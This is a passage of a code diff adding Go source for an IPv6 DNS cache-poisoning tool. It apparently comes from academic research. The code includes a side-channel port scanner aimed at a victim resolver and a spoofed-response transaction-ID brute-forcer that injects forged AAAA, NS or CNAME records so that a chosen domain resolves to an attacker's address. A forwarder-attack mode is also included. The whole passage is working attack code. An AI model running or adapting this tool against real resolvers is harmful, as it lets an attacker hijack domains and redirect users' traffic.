 		} else if nestedIp := nestedIpLayer.(*layers.IPv6); nestedIp == nil {
 			continue
 		} else {
 			r := getBackendResolver(nestedIp.DstIP)
 			if r != nil {
 				nestedUDPLayer := nestedIpPacket.Layer(layers.LayerTypeUDP)
 				if nestedUDPLayer == nil {
 					fmt.Println("nestedUDPLayer == nil")
 					continue
 				}
 				nestedUDP := nestedUDPLayer.(*layers.UDP)
 				if nestedUDP == nil {
 					fmt.Println("nestedUDP == nil")
 					continue
 				}
 				//got verification packet back
 				if nestedIp.FlowLabel > 1 {
 					//update rtt
 					/* Potential BUG: rtt of both resolver may not be the same. */
 					newrtt := captureInfo.Timestamp.Sub(r.groupSendTime[nestedIp.FlowLabel]).Nanoseconds()/1000000 + 1
 					if newrtt >= 0 && newrtt < 5000 {
 						var draftJitter uint = 0
 						if uint(newrtt) > rtt {
 							draftJitter = uint(newrtt) - rtt
 						} else {
 							draftJitter = (jitter + (rtt - uint(newrtt))) / 2
 						}
 						if jitter > 30 {
 							fmt.Println("Jitter > 30ms!")
 							jitter = 10
 						} else {
 							jitter = draftJitter
 						}
 						rtt = uint(newrtt)
 						if debugOutput {
 							fmt.Println("rtt=", rtt, ", jitter=", jitter)
 						}
 					} else {
 						fmt.Println("newrtt error:", newrtt)
 					}
 					//reduce ratelimit counter
 					localIPNum := getLocalIPNum(nestedIp.SrcIP)
 					if localIPNum != -1 {
 						if r.perIPLimitCounter[localIPNum] >= 0 {
 							r.perIPLimitCounter[localIPNum]--
 						}
 						if r.perIPLimitCounter[localIPNum] < 0 {
 							if debugOutput {
 								/* This may happen in real attacks. Don't panic :). */
 								fmt.Println(r.resolverBackendIP, "bug: perIPLimitCounter < 0")
 							}
 						}
 						if debugOutput {
 							fmt.Println(r.resolverBackendIP, "remaining counter:", localIPNum, r.perIPLimitCounter[localIPNum])
 						}
 					} else {
 						if debugOutput {
 							fmt.Println("received unwanted ICMP for", nestedIp.SrcIP)
 						}
 					}
 					//process the packet
 					binarySearch(r, nestedIp.FlowLabel)
 				}
 				/* This is used to terminate TxID brute forcing earlier if we found the port is indeed not open (i.e., false positive) to avoid wasting time.
 				* Check related code to see if this really works before uncommenting this.
 				* This may not be useful since brute force only takes ~800ms, which is fairly short.
 				* To uncomment this, make clear which backend resolver sent the message so that resolvers won't interfere with each other */
 				//else if nestedIp.Id == 2 {
 				//	//got verification packet for DNS brute forcing
 				//	bruteForceShouldBeKilled = false
 				//}
 			}
 		}
 	}
 }
 func binarySearch(r *backendResolver, flowlabel uint32) {
 	groupLen := 0
 	group := r.groups[flowlabel]
 	for _, port := range group {
 		if port != 65535 {
 			groupLen++
 		} else {
 			break
 		}
 	}
 	if groupLen == 1 {
 		//brute force
 		r.networkXmitLock.Lock()
 		dnsBruteForce(group[0], timeGap, r.resolverBackendIP, auxiliaryDomain)
 		r.networkXmitLock.Unlock()
 		r.alwaysOpenPorts[group[0]] = true
 	} else if groupLen > 1 {
 		var repeatTimes1 int
 		if repeatTimes > 1 {
 			repeatTimes1 = repeatTimes + 1
 		} else {
 			repeatTimes1 = 1
 		}
 		for j := 0; j < repeatTimes1; j++ {
 			//left
 			id := allocateGroupID(r)
 			r.groups[id] = make([]uint16, groupLen/2)
 			copy(r.groups[id], group[0:groupLen/2])
 			for len(r.groups[id]) < GROUP_SIZE {
 				r.groups[id] = append(r.groups[id], 65535)
 			}
 			if debugOutput {
 				fmt.Println(r.resolverBackendIP, "bs", r.groups[id][0], "+", groupLen/2)
 			} else {
 				fmt.Println("Found something interesting!")
 			}
 			r.priorityProbeChannel <- flowlabel
 			//right
 			id = allocateGroupID(r)
 			r.groups[id] = make([]uint16, groupLen-groupLen/2)
 			copy(r.groups[id], group[groupLen/2:groupLen])
 			for len(r.groups[id]) < GROUP_SIZE {
 				r.groups[id] = append(r.groups[id], 65535)
 			}
 			//fmt.Println(r.resolverBackendIP, "bsr", r.groups[id][0], "+", groupLen-groupLen/2)
 			r.priorityProbeChannel <- flowlabel
 		}
 	} else {
 		if debugOutput {
 			fmt.Println(r.resolverBackendIP, "bug: groupLen <= 0, id=", flowlabel)
 			for _, port := range group {
 				fmt.Print(port)
 			}
 		}
 	}
 }
 func perIPLimitRecover(r *backendResolver, num int) {
 	for {
 		if r.perIPLimitCounter[num] < 6 {
 			time.Sleep(time.Second + (time.Duration(defaultJitter)+50)*time.Millisecond)
 			r.perIPLimitCounter[num]++
 		} else {
 			time.Sleep((time.Duration(defaultJitter) + 1) * time.Millisecond)
 		}
 	}
 }
 func probeSender(r *backendResolver) {
 	for {
 		var id uint32
 		select {
 		case id = <-r.priorityProbeChannel:
 			break
 		case id = <-r.probeChannel:
 			break
 			//default:
 			//	time.Sleep(time.Microsecond)
 		}
 		/* in favor of brute force when there is no per ip permit and there is only one port in group */
 		if getIPwithAvailableCounter(r) == nil && r.groups[id][1] == 65535 {
 			//brute force
 			r.networkXmitLock.Lock()
 			dnsBruteForce(r.groups[id][0], timeGap, r.resolverBackendIP, auxiliaryDomain)
 			r.networkXmitLock.Unlock()
 			r.alwaysOpenPorts[r.groups[id][0]] = true
 			continue
 		}
 		//test per ip rate limit
 		var verifyIP net.IP
 		for {
 			verifyIP = getIPwithAvailableCounter(r)
 			if verifyIP == nil {
 				time.Sleep(time.Millisecond)
 			} else {
 				break
 			}
 		}
 		//send
 		ports := r.groups[id]
 		r.networkXmitLock.Lock()
 		for i := 0; i < GROUP_SIZE; i++ {
 			if defaultJitter <= 3 {
 				if attackForwarder {
 					xmitUDPv6(authIP, r.resolverBackendIP, 53, layers.UDPPort(ports[i]), id, 100)
 				} else {
 					xmitUDPv6(authIP, r.resolverBackendIP, 53, layers.UDPPort(ports[i]), id, 1)
 				}
 			} else {
 				xmitUDPv6(authIP, r.resolverBackendIP, 53, layers.UDPPort(ports[i]), id, 0)
 			}
 		}
 		time.Sleep(time.Duration(defaultJitter) * time.Millisecond)
 		//verify
 		xmitUDPv6(verifyIP, r.resolverBackendIP, 53, 65535, id, 10)
 		r.groupSendTime[id] = time.Now()
 		if rand.Uint32()%100 < 2 {
 			if debugOutput {
 				fmt.Println(r.resolverBackendIP, "probing", ports[0])
 			} else {
 				fmt.Println("Continue attacking...")
 			}
 		}
 		//recover global counter
 		if !attackForwarder {
 			time.Sleep(time.Duration(60-defaultJitter) * time.Millisecond)
 		} else {
 			/* IDK why I wrote this line. Forwarders should be the same as resolvers if they support global rate limit. */
 			time.Sleep(time.Duration(60) * time.Millisecond)
 		}
 		r.networkXmitLock.Unlock()
 	}
 }
 func portGroupFormer(r *backendResolver, startPort uint, endPort uint) {
 	for {
 		//divide into groups
 		var id uint32 = 0
 		var currentGroupSize = 0
 		for i := startPort; i <= endPort; i++ {
 			/* It's unlikely the port is reused for further queries. But it's still possible. Uncomment here if you feed like port reusing is unlikely to happen. */
 			//if r.alwaysOpenPorts[i] {
 			//	continue
 			//}
 			if currentGroupSize%GROUP_SIZE == 0 {
 				if id != 0 {
 					r.probeChannel <- id
 					for j := 1; j < repeatTimes; j++ {
 						//dup
 						previd := id
 						id = allocateGroupID(r)
 						r.groups[id] = make([]uint16, len(r.groups[previd]))
 						copy(r.groups[id], r.groups[previd])
 						r.probeChannel <- id
 					}
 				}
 				id = allocateGroupID(r)
 				r.groups[id] = make([]uint16, 0)
 			}
 			r.groups[id] = append(r.groups[id], uint16(i))
 			currentGroupSize++
 		}
 		//deal with last several cases
 		if /*len(r.groups[id]) != 50 &&*/ len(r.groups[id]) != 0 {
 			for len(r.groups[id]) != 50 && len(r.groups[id]) != 0 {
 				r.groups[id] = append(r.groups[id], 65535)
 			}
 			r.probeChannel <- id
 			for j := 1; j < repeatTimes; j++ {
 				//dup
 				previd := id
 				id = allocateGroupID(r)
 				r.groups[id] = make([]uint16, len(r.groups[previd]))
 				copy(r.groups[id], r.groups[previd])
 				r.probeChannel <- id
 			}
 		}
 	}
 }
 func main() {
 	/* This program only finds & injects DNS responses automatically. Additional authoritative server muting/flooding scripts are needed. */
 	/* IPv6 is not supported yet. */
 	/* Use "-h to get usage. " */
 	/* Author: Keyu Man (kman001@ucr.edu) */
 	/* Attaching PoC? */
 	/* Add Paper Bio? */
 	ifaceName := flag.String("i", "vmnet1", "Interface for attacking. Multiple interfaces are not supported. Multiple IPs per interface is supported.")
 	/* If automatic MAC address discovery doesn't work. consider enable this option and feed it to the MAC field. */
 	// gateWayMacStr := flag.String("g", "00:11:22:33:44:55", "Gateway Mac")
 	authServer := flag.String("a", "", "Authoritative server for the domain to be poisoned.")
 	resolver := flag.String("r", "8.8.8.8", "Front-end IP of the victim resolver.")
 	resolverBackend := flag.String("b", "", "Back-end IP of the victim resolver.")
 	resolverBackendList := flag.String("bn", "", "Back-end IP list of the victim resolver. One per line. This would overwrite \"-b\" and is used when the server has multiple backend IPs.")
 	startPort := flag.Uint("s", 1, "Lowest port # for the port scan range, inclusive.")
 	endPort := flag.Uint("e", 65534, "Highest port # for the port scan range, inclusive.")
 	victimDNSName := flag.String("n", "", "The domain name to be poisoned.")
 	dnsQueryTmeout := flag.Uint("t", 4000, "Timeout in ms for outgoing dns queries to the victim resolver. Should be aligned with the resolver's timeout (e.g., BIND is 10000ms by default).")
 	defaultJitter := flag.Uint("j", 5, "Time gap between verification packet and the latest probe packet in a group. Increase the value if Jitter is increased.")
 	repeatTimes := flag.Uint("R", 1, "Retransmit/Reprobe a group of ports for X times to reduce FNs.")
 	timeGap := flag.Uint("tg", 0, "Time gap is us(microseconds) between the TxID brute force packets.")
 	//auxiliaryDomain := flag.String("ad", "", "Attacker-controlled domain used to host the fake NS for the victim domain and to store the fake AAAA record of the victim domain.")
 	attackertarget := flag.String("at", "", "攻击者想要更改到的IPv6地址")
 	debugOutput := flag.Bool("d", false, "Debug output mode.")
 	attackerMaliciousDomain := flag.String("af", "", "Attacker controlled domain used in the forwarder attack, this will enable the forwarder attack mode.")
 	soaName := flag.String("soa", "", "SOA name of the victim domain on attacker-controlled name server used to indicate the resolver has been poisoned. (Resolver attack only.)")
 	//特殊用途
 	isfake := flag.Int("f", 0, "")
 	flag.Parse()
 	//gatewayMac, _ := net.ParseMAC(*gateWayMacStr)
 	Main(*ifaceName, net.ParseIP(*authServer), net.ParseIP(*resolver), net.ParseIP(*resolverBackend), *startPort, *endPort, *victimDNSName, *dnsQueryTmeout, *defaultJitter,
 		*attackerMaliciousDomain, *resolverBackendList, *debugOutput, *repeatTimes, *timeGap, *attackertarget, *soaName, *isfake)
 	os.Exit(0)
 }
 func Main(ifaceName string, authIPArg net.IP, resolverIPArg net.IP, resolverBackendIPArg net.IP, startPort uint, endPort uint, victimDNSNameArg string, dnsQueryTimeout uint,
 	defaultJitterArg uint, attackerMaliciousDomainArg string, resolverBackendList string, debugOutputArg bool, repeatTimesArg uint, timeGapArg uint, attackertargetIP string,
 	soaNameArg string, isfake int) {
 	fmt.Println("/***Please make sure to fill every argument carefully and correct. Otherwise the program will crash.***/")
 	// 特殊用途
 	if isfake == 1 {
 		c := new(dns.Client)
 		msg := new(dns.Msg)
 		if strings.Contains(attackertargetIP, ":") { // attackertargetIP -- 攻击者要更改到的IPv6地址
 			println("目标：" + resolverBackendIPArg.String()) // resolverBackendIPArg -- Back-end IP of the victim resolver
 			ipcode := strings.ReplaceAll(attackertargetIP, ":", "-")
 			if victimDNSNameArg[len(victimDNSNameArg)-1:] != "." { // victimDNSNameArg -- The domain name to be poisoned
 				victimDNSNameArg = victimDNSNameArg + "."
 			}
 			domain := ipcode + "." + victimDNSNameArg
 			fmt.Println("查询的目标域名：" + domain)
 			msg.SetQuestion(domain, dns.TypeAAAA)
 			_, _, _ = c.Exchange(msg, net.JoinHostPort(resolverBackendIPArg.String(), "53"))
 			return
 		} else {
 			println(attackertargetIP)
 			println(victimDNSNameArg)
 			println("参数有误，请输入IPv6地址作为篡改目标结果")
 		}
 	} else {
 		c := new(dns.Client)
 		msg := new(dns.Msg)
 		// domain := "www.google.com."
 		// msg.SetQuestion(domain, dns.TypeAAAA)
 		// for i := 0; i < 10000; i++ {
 		// 	go func() {
 		// 		_, _, _ = c.Exchange(msg, net.JoinHostPort("8.8.8.8", "53"))
 		// 	}()
 		// }
 		domain := "daffteg." + victimDNSNameArg
 		msg.SetQuestion(domain, dns.TypeAAAA)
 		_, _, _ = c.Exchange(msg, net.JoinHostPort(resolverBackendIPArg.String(), "53"))
 		return
 	}
 	rand.Seed(time.Now().UnixNano())
 	handle, _ = pcap.OpenLive(
 		ifaceName,
 		65536,
 		true,
 		pcap.BlockForever,
 	)
 	println(authIPArg.To16().String())
 	err := handle.SetBPFFilter("not host " + authIPArg.To16().String())
 	if err != nil {
 		fmt.Println("cannot set BPF filter.")
 	}
 	iface, err := net.InterfaceByName(ifaceName)
 	if err != nil {
 		fmt.Println("cannot open network interface")
 		os.Exit(1)
 	}
 	if attackerMaliciousDomainArg != "" {
 		attackForwarder = true
 		fmt.Println("Forwarder Attack Mode!")
 		attackerControlledDomain = attackerMaliciousDomainArg
 	}
 	authIP = authIPArg
 	resolverIP = resolverIPArg
 	victimDNSName = victimDNSNameArg
 	debugOutput = debugOutputArg
 	timeGap = timeGapArg
 	soaName = soaNameArg
 	localIP, _ = GetIfaceAddrMulti(iface)
 	nonce := strconv.Itoa(rand.Int())
 	if !attackForwarder {
 		dnsQueryName = nonce + "." + victimDNSName
 	} else {
 		dnsQueryName = nonce + "." + attackerControlledDomain
 	}
 	defaultJitter = defaultJitterArg
 	repeatTimes = int(repeatTimesArg)
 	if resolverBackendList != "" {
 		file, err := os.Open(resolverBackendList)
 		if err != nil {
 			fmt.Println(err)
 			os.Exit(10)
 		}
 		for {
 			var resolverIP string
 			n, err := fmt.Fscanf(file, "%s", &resolverIP)
 			if n <= 0 || err != nil {
 				break
 			}
 			backendResolvers = append(backendResolvers, backendResolverBuilder(net.ParseIP(resolverIP)))
 		}
 	} else {
 		//r1 shouldn't be nil
 		r1 := backendResolverBuilder(resolverBackendIPArg)
 		backendResolvers = append(backendResolvers, r1)
 	}
 	//figure out MAC address
 	//test if it's in LAN first
 	dstMac, err := GetGatewayAddr(iface, handle, backendResolvers[0].resolverBackendIP.To16())
 	if err == nil {
 		ethernetLayer = &layers.Ethernet{
 			SrcMAC: iface.HardwareAddr,
 			DstMAC: dstMac,
 			//EthernetType: layers.EthernetTypeIPv4,
 			EthernetType: layers.EthernetTypeIPv6,
 		}
 		fmt.Println("Mac:", dstMac)
 	} else {
 		//query routing table
 		router, err := routing.New()
 		if err != nil {
 			fmt.Println(err)
 			os.Exit(4)
 		}
 		_, nextHopIP, _, err := router.Route(backendResolvers[0].resolverBackendIP)
 		if err != nil {
 			fmt.Println(err)
 			os.Exit(5)
 		}
 		dstMac, err := GetGatewayAddr(iface, handle, nextHopIP.To16())
 		if err != nil {
 			fmt.Println(err)
 			os.Exit(6)
 		}
 		fmt.Println("MAC:", dstMac)
 		ethernetLayer = &layers.Ethernet{
 			SrcMAC: iface.HardwareAddr,
 			DstMAC: dstMac,
 			//EthernetType: layers.EthernetTypeIPv4,
 			EthernetType: layers.EthernetTypeIPv6,
 		}
 	}
 	go receivingThread()
 	for i, ip := range localIP {
 		if debugOutput {
 			fmt.Println("use IP", ip)
 		}
 		for _, r := range backendResolvers {
 			go perIPLimitRecover(r, i)
 		}
 	}
 	go dnsRequestSender(dnsQueryTimeout)
 	for _, r := range backendResolvers {
 		go probeSender(r)
 		go portGroupFormer(r, startPort, endPort)
 		time.Sleep(25 * time.Millisecond)
 	}
 	time.Sleep(999 * time.Hour)
 }
 func allocateGroupID(r *backendResolver) uint32 {
 	r.groupIDCounterLock.Lock()
 	id := r.groupIDCounter
 	r.groupIDCounter++
 	if r.groupIDCounter == 0 {
 		r.groupIDCounter = 3
 	}
 	r.groupIDCounterLock.Unlock()
 	return id
 }
 func getBackendResolver(resolverIP net.IP) *backendResolver {
 	for _, r := range backendResolvers {
 		if compareIPv6Addr(r.resolverBackendIP, resolverIP) == 0 {
 			return r
 		}
 	}
 	return nil
 }
 func lockNetwork() {
 	for _, r := range backendResolvers {
 		r.networkXmitLock.Lock()
 	}
 }
 func unlockNetwork() {
 	for _, r := range backendResolvers {
 		r.networkXmitLock.Unlock()
 	}
 }
 func getLocalIPNum(ip net.IP) int {
 	for i, localip := range localIP {
 		if compareIPv6Addr(localip, ip) == 0 {
 			return i
 		}
 	}
 	return -1
 }
 func backendResolverBuilder(backendIP net.IP) *backendResolver {
 	if backendIP == nil {
 		return nil
 	}
 	temp := backendResolver{
 		resolverBackendIP:    backendIP,
 		groups:               make([][]uint16, 65536),
 		groupIDCounter:       3,
 		groupIDCounterLock:   &sync.Mutex{},
 		groupSendTime:        make([]time.Time, 65536),
 		probeChannel:         make(chan uint32, 655),
 		priorityProbeChannel: make(chan uint32, 655),
 		alwaysOpenPorts:      make([]bool, 65536),
 		perIPLimitCounter:    make([]int, len(localIP)),
 		networkXmitLock:      &sync.Mutex{},
 	}
 	for i := range temp.perIPLimitCounter {
 		temp.perIPLimitCounter[i] = 6
 	}
 	for i := 0; i < 65536; i++ {
 		temp.alwaysOpenPorts[i] = false
 	}
 	temp.alwaysOpenPorts[53] = true
 	temp.alwaysOpenPorts[0] = true
 	temp.alwaysOpenPorts[65535] = true
 	return &temp
 }
 // distribute verification to multiple IPs evenly
 func getIPwithAvailableCounter(r *backendResolver) net.IP {
 	seed := rand.Int() % len(localIP)
 	for i := 0; i < len(localIP); i++ {
 		if r.perIPLimitCounter[(i+seed)%len(localIP)] > 0 {
 			return localIP[(i+seed)%len(localIP)]
 		}
 	}
 	return nil
 }
--- a/4_v6_injection/src/ucr.edu/fakedns6/dns.go
+++ b/4_v6_injection/src/ucr.edu/fakedns6/dns.go
@@ -0,0 +1,332 @@
 package main
 import (
 	"fmt"
 	"github.com/google/gopacket/layers"
 	"math/rand"
 	"net"
 	"time"
 )
 var bruteForceCouldBeKilled bool
 func sendDNSRequest(id uint16, name string) {
 	if debugOutput {
 		fmt.Println("Send new DNS request", name, id)
 	}
 	_sendDNSRequest(id, name, localIP[0], resolverIP, (layers.UDPPort)(rand.Uint32()), 53)
 }
 func _sendDNSRequest(id uint16, name string, src net.IP, dst net.IP, sport layers.UDPPort, dport layers.UDPPort) {
 	ipLayer := layers.IPv6{
 		FlowLabel:  1,
 		SrcIP:      src,
 		DstIP:      dst,
 		Version:    6,
 		HopLimit:   64,
 		NextHeader: layers.IPProtocolUDP,
 		//Flags:      layers.IPv4DontFragment,
 	}
 	udpLayer := layers.UDP{
 		SrcPort: sport,
 		DstPort: dport,
 	}
 	dnsLayer := layers.DNS{
 		ID:           id,
 		QR:           false,
 		OpCode:       0,
 		AA:           false,
 		TC:           false,
 		RD:           true,
 		RA:           false,
 		Z:            0,
 		ResponseCode: 0,
 		QDCount:      1,
 		ANCount:      0,
 		NSCount:      0,
 		ARCount:      0,
 		Questions: []layers.DNSQuestion{{
 			Name:  []byte(name),
 			Type:  layers.DNSTypeAAAA,
 			Class: layers.DNSClassIN,
 		}},
 		Authorities: nil,
 		Additionals: nil,
 	}
 	err := udpLayer.SetNetworkLayerForChecksum(&ipLayer)
 	if err != nil {
 		fmt.Println("udpLayer.SetNetworkLayerForChecksum @ dns.go pos 0 error", err)
 	}
 	err = Send(handle, ethernetLayer, &ipLayer, &udpLayer, &dnsLayer)
 	if err != nil {
 		fmt.Println("can not send packet @ sendDNSRequest: ", err)
 	}
 }
 func bruteForceTerminatingTimer(timegap uint) {
 	time.Sleep(time.Duration(timegap) * time.Millisecond)
 	bruteForceCouldBeKilled = true
 }
 func dnsBruteForce(targetPort uint16, timegap uint, resolverBackendIP net.IP, auxDomain string) {
 	bruteForceShouldBeKilled = true
 	bruteForceCouldBeKilled = false
 	ipLayer := layers.IPv6{
 		FlowLabel:  2,
 		SrcIP:      authIP,
 		DstIP:      resolverBackendIP,
 		Version:    6,
 		HopLimit:   64,
 		NextHeader: layers.IPProtocolUDP,
 		//Flags:    layers.IPv4DontFragment,
 	}
 	udpLayer := layers.UDP{
 		SrcPort: 53,
 		DstPort: layers.UDPPort(targetPort),
 	}
 	dnsLayer := layers.DNS{
 		ID:           0,
 		QR:           true,
 		OpCode:       0,
 		AA:           true,
 		TC:           false,
 		RD:           false,
 		RA:           false,
 		Z:            0,
 		ResponseCode: layers.DNSResponseCodeNoErr,
 		/* Answers for A request for ns.a.com */
 		//Questions: []layers.DNSQuestion{{
 		//	Name:  []byte(victimAuthName),
 		//	Type:  layers.DNSTypeA,
 		//	Class: layers.DNSClassIN,
 		//}},
 		//Answers: []layers.DNSResourceRecord{{
 		//	Name:  []byte(victimAuthName),
 		//	Type:  layers.DNSTypeA,
 		//	Class: layers.DNSClassIN,
 		//	TTL:   300,
 		//	IP:    net.ParseIP(""),
 		//	CNAME: nil,
 		//	PTR:   nil,
 		//	TXTs:  nil,
 		//	SOA:   layers.DNSSOA{},
 		//	SRV:   layers.DNSSRV{},
 		//	MX:    layers.DNSMX{},
 		//	OPT:   nil,
 		//	TXT:   nil,
 		//}},
 		//Authorities: nil,
 		//Additionals: nil,
 		/* Answers for A request for www.a.com */
 		//Questions: []layers.DNSQuestion{{
 		//	Name:  []byte(victimDNSName),
 		//	Type:  layers.DNSTypeA,
 		//	Class: layers.DNSClassIN,
 		//}},
 		//Answers: []layers.DNSResourceRecord{{
 		//	Name:  []byte(victimDNSName),
 		//	Type:  layers.DNSTypeA,
 		//	Class: layers.DNSClassIN,
 		//	TTL:   300,
 		//	IP:    net.ParseIP(""),
 		//	CNAME: nil,
 		//	PTR:   nil,
 		//	TXTs:  nil,
 		//	SOA:   layers.DNSSOA{},
 		//	SRV:   layers.DNSSRV{},
 		//	MX:    layers.DNSMX{},
 		//	OPT:   nil,
 		//	TXT:   nil,
 		//}},
 		//Authorities: nil,
 		//Additionals: nil,
 		/* Answers for A request for ***.www.a.com */
 		//Questions: []layers.DNSQuestion{{
 		//	Name:  []byte(dnsQueryName),
 		//	Type:  layers.DNSTypeA,
 		//	Class: layers.DNSClassIN,
 		//}},
 		//Authorities: []layers.DNSResourceRecord{{
 		//	Name:  []byte(victimDNSName),
 		//	Type:  layers.DNSTypeNS,
 		//	Class: layers.DNSClassIN,
 		//	TTL:   300,
 		//	IP:    nil,
 		//	NS:    []byte(auxDomain),
 		//	CNAME: nil,
 		//	PTR:   nil,
 		//	TXTs:  nil,
 		//	SOA:   layers.DNSSOA{},
 		//	SRV:   layers.DNSSRV{},
 		//	MX:    layers.DNSMX{},
 		//	OPT:   nil,
 		//	TXT:   nil,
 		//}},
 		//Answers:     nil,
 		//Additionals: nil,
 	}
 	if !attackForwarder {
 		dnsLayer.Questions = []layers.DNSQuestion{{
 			Name:  []byte(dnsQueryName),
 			Type:  layers.DNSTypeAAAA,
 			Class: layers.DNSClassIN,
 		}}
 		// 原方案：将域名NS篡改到attacker的服务器上
 		//dnsLayer.Authorities = []layers.DNSResourceRecord{{
 		//	Name:  []byte(victimDNSName),
 		//	Type:  layers.DNSTypeNS,
 		//	Class: layers.DNSClassIN,
 		//	TTL:   300,
 		//	IP:    nil,
 		//	NS:    []byte(auxDomain),
 		//	CNAME: nil,
 		//	PTR:   nil,
 		//	TXTs:  nil,
 		//	SOA:   layers.DNSSOA{},
 		//	SRV:   layers.DNSSRV{},
 		//	MX:    layers.DNSMX{},
 		//	OPT:   nil,
 		//	TXT:   nil,
 		//}}
 		//dnsLayer.Answers = nil
 		//dnsLayer.Additionals = nil
 		dnsLayer.Authorities = []layers.DNSResourceRecord{{
 			Name:  []byte(dnsQueryName),
 			Type:  layers.DNSTypeNS,
 			Class: layers.DNSClassIN,
 			TTL:   300,
 			IP:    nil,
 			NS:    []byte(auxDomain),
 			CNAME: nil,
 			PTR:   nil,
 			TXTs:  nil,
 			SOA:   layers.DNSSOA{},
 			SRV:   layers.DNSSRV{},
 			MX:    layers.DNSMX{},
 			OPT:   nil,
 			TXT:   nil,
 		}}
 		dnsLayer.Answers = []layers.DNSResourceRecord{{
 			Name:  []byte(dnsQueryName),
 			Type:  layers.DNSTypeAAAA,
 			Class: layers.DNSClassIN,
 			TTL:   300,
 			/* Fill with any IP you want. The victim domain will be hijacked to this IP. */
 			IP:    net.ParseIP("2001::1234"),
 			NS:    nil,
 			CNAME: nil,
 			PTR:   nil,
 			TXTs:  nil,
 			SOA:   layers.DNSSOA{},
 			SRV:   layers.DNSSRV{},
 			MX:    layers.DNSMX{},
 			OPT:   nil,
 			TXT:   nil,
 		}}
 		dnsLayer.Additionals = nil
 	} else {
 		/* Change these flags accordingly to the request sent by the resolver. */
 		dnsLayer.AA = false
 		dnsLayer.RD = true
 		dnsLayer.RA = true
 		dnsLayer.Questions = []layers.DNSQuestion{{
 			Name:  []byte(dnsQueryName),
 			Type:  layers.DNSTypeAAAA,
 			Class: layers.DNSClassIN,
 		}}
 		dnsLayer.Answers = []layers.DNSResourceRecord{{
 			Name:  []byte(dnsQueryName),
 			Type:  layers.DNSTypeCNAME,
 			Class: layers.DNSClassIN,
 			TTL:   300,
 			IP:    nil,
 			NS:    nil,
 			CNAME: []byte(victimDNSName),
 			PTR:   nil,
 			TXTs:  nil,
 			SOA:   layers.DNSSOA{},
 			SRV:   layers.DNSSRV{},
 			MX:    layers.DNSMX{},
 			OPT:   nil,
 			TXT:   nil,
 		}, {
 			Name:  []byte(victimDNSName),
 			Type:  layers.DNSTypeAAAA,
 			Class: layers.DNSClassIN,
 			TTL:   300,
 			/* Fill with any IP you want. The victim domain will be hijacked to this IP. */
 			IP:    net.ParseIP("2001::1234"),
 			NS:    nil,
 			CNAME: nil,
 			PTR:   nil,
 			TXTs:  nil,
 			SOA:   layers.DNSSOA{},
 			SRV:   layers.DNSSRV{},
 			MX:    layers.DNSMX{},
 			OPT:   nil,
 			TXT:   nil,
 		}}
 	}
 	err := udpLayer.SetNetworkLayerForChecksum(&ipLayer)
 	if err != nil {
 		fmt.Println("udpLayer.SetNetworkLayerForChecksum @ dns.go error", err)
 	}
 	if debugOutput {
 		fmt.Println("DNS BruteForce: ", targetPort)
 	}
 	startTime := time.Now()
 	var txid uint16
 	//try to see if this port is open in reality
 	for txid = 0; txid < GROUP_SIZE*2; txid++ {
 		dnsLayer.ID = txid
 		err = Send(handle, ethernetLayer, &ipLayer, &udpLayer, &dnsLayer)
 		if err != nil {
 			fmt.Println("can not send packet @ sendDNSRequest pos 1: ", err)
 		}
 		time.Sleep(time.Duration(timegap) * time.Microsecond)
 	}
 	/* This is used for early termination */
 	//verification packet
 	//xmitUDPv6(localIP, resolverBackendIP, layers.UDPPort(targetPort), 65535, 2, 0)
 	//go bruteForceTerminatingTimer( /*jitter + defaultJitter*/ defaultJitter + 60)
 	//continue brute force
 	for txid = GROUP_SIZE * 2; txid < 0xffff; txid++ {
 		/* This is used for early termination */
 		//if bruteForceCouldBeKilled && bruteForceShouldBeKilled {
 		//	fmt.Println("DNS Brute force aborted")
 		//	break
 		//}
 		dnsLayer.ID = txid
 		err := Send(handle, ethernetLayer, &ipLayer, &udpLayer, &dnsLayer)
 		if err != nil {
 			fmt.Println("can not send packet @ DNSBruteForce: ", err)
 		}
 		if timegap != 0 {
 			time.Sleep(time.Duration(timegap) * time.Microsecond)
 		}
 	}
 	//0xffff is missing from packet trace
 	/* This is used for early termination */
 	//if !bruteForceShouldBeKilled {
 	dnsLayer.ID = 0xffff
 	err = Send(handle, ethernetLayer, &ipLayer, &udpLayer, &dnsLayer)
 	if err != nil {
 		fmt.Println("can not send packet @ DNSBruteForce pos 2: ", err)
 	}
 	//}
 	if debugOutput {
 		fmt.Println("time: ", time.Now().Sub(startTime))
 	}
 	//help to recover the global counter
 	time.Sleep(time.Duration(60+ /*jitter + defaultJitter*/ defaultJitter) * time.Millisecond)
 }
--- a/4_v6_injection/src/ucr.edu/fakedns6/fakedns6
+++ b/4_v6_injection/src/ucr.edu/fakedns6/fakedns6
--- a/4_v6_injection/src/ucr.edu/fakedns6/go.mod
+++ b/4_v6_injection/src/ucr.edu/fakedns6/go.mod
@@ -0,0 +1,15 @@
 module fakedns6
 go 1.20
 require (
 	github.com/google/gopacket v1.1.19
 	github.com/miekg/dns v1.1.57
 )
 require (
 	golang.org/x/mod v0.12.0 // indirect
 	golang.org/x/net v0.17.0 // indirect
 	golang.org/x/sys v0.13.0 // indirect
 	golang.org/x/tools v0.13.0 // indirect
 )
--- a/4_v6_injection/src/ucr.edu/fakedns6/go.sum
+++ b/4_v6_injection/src/ucr.edu/fakedns6/go.sum
@@ -0,0 +1,25 @@
 github.com/google/gopacket v1.1.19 h1:ves8RnFZPGiFnTS0uPQStjwru6uO6h+nlr9j6fL7kF8=
 github.com/google/gopacket v1.1.19/go.mod h1:iJ8V8n6KS+z2U1A8pUwu8bW5SyEMkXJB8Yo/Vo+TKTo=
 github.com/miekg/dns v1.1.57 h1:Jzi7ApEIzwEPLHWRcafCN9LZSBbqQpxjt/wpgvg7wcM=
 github.com/miekg/dns v1.1.57/go.mod h1:uqRjCRUuEAA6qsOiJvDd+CFo/vW+y5WR6SNmHE55hZk=
 golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w=
 golang.org/x/crypto v0.0.0-20191011191535-87dc89f01550/go.mod h1:yigFU9vqHzYiE8UmvKecakEJjdnWj3jj499lnFckfCI=
 golang.org/x/lint v0.0.0-20200302205851-738671d3881b/go.mod h1:3xt1FjdF8hUf6vQPIChWIBhFzV8gjjsPE/fR3IyQdNY=
 golang.org/x/mod v0.1.1-0.20191105210325-c90efee705ee/go.mod h1:QqPTAvyqsEbceGzBzNggFXnrqF1CaUcvgkdR5Ot7KZg=
